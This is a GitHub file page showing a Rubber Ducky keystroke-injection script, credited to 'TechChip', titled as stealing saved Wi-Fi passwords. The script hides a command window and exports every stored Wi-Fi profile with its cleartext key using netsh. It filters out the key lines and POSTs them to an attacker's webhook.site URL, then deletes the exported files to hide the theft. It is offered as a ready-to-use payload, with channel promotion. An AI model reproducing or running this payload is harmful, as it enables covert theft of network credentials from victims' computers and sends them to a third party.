-
Notifications
You must be signed in to change notification settings - Fork 11
Expand file tree
/
Copy pathduckypayload.txt
More file actions
31 lines (31 loc) · 760 Bytes
/
duckypayload.txt
File metadata and controls
31 lines (31 loc) · 760 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
REM Ducky Script for Steal Saved WiFi Password
REM Author - TechChip
REM https://github.com/techchipnet
REM https://youtube.com/techchipnet
DELAY 500
GUI r
DELAY 1000
STRING cmd /k mode con: cols=25 lines=1
DELAY 100
ENTER
DELAY 1000
STRING cd %temp%
ENTER
DELAY 500
STRING netsh wlan export profile key=clear
ENTER
DELAY 500
STRING powershell Select-String -Path Wi-Fi*.xml -Pattern 'keyMaterial' > WiFi-Key
ENTER
DELAY 1000
DELAY 500
REM next command will post wifi password on webhook.site
REM watch demo on techchip youtube channel
STRING powershell Invoke-WebRequest -Uri https://webhook.site/<paste webhook unique id here> -Method POST -InFile WiFi-Key
ENTER
STRING del Wi* /s/f/q
ENTER
DELAY 500
STRING exit
ENTER
REM Subscribe techchip youtube channel